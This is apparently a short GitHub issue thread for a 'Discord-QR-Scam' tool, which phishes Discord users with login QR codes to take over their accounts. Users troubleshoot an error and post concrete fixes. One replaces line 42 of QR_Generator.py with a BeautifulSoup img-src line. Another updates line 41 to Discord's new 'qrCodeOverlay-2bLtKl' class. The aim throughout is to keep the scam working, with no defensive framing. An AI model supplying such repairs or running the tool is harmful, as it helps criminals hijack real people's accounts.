Discord-QR-Scam
Discord-QR-Scam copied to clipboard
NoneType doesnt find attribute "find"
I tried it but then i got an error message.
Open "QR_Generator.py" and replace line 42 with the following:
qr_code = soup.find('img')['src']
I've updated my Fork to fix this
qrCodeOverlay-2bLtKl in line 41 you change the prevoius class with the one above, discord has changed it so the code still searches for the prevoius one.